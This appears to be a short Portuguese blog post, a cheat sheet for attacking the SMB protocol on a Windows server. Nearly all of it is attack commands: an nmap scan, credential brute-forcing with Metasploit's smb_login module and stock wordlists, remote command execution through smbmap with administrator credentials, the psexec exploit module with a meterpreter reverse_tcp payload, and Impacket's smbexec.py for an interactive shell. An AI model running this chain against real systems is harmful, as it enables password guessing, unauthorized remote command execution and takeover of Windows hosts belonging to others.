SMB Exploit com Metasploit e Impacket
Como explorar o protocolo SMB em um servidor Windows usando o Metasploit?
NMAP Geral
nmap -Pn -sV [IP]
Brute-Force com Metasploit
Módulo: auxiliary/scanner/smb/smb_login
Wordlists:
/usr/share/metasploit-framework/data/wordlists/common_users.txt
/usr/share/metasploit-framework/data/wordlists/unix_passwords.txt
Credencial identificada
smbmap -H [IP] -u administrator -p [senha] -x '[comando]'
smbclient -L [IP] -U administrator
Módulo: exploit/windows/smb/psexec
Payload: windows/meterpreter/reverse_tcp
O impacket possui diversos scripts em python para explorar o protocolo SMB. O script psexec.py estabelece uma shell interativa, conforme mostrado abaixo.
Geralmente a localização dos scripts do Impacket é /opt/impacket/examples
python3 smbexec.py administrator@[IP]
Conexão estabelecida
Comentários
Postar um comentário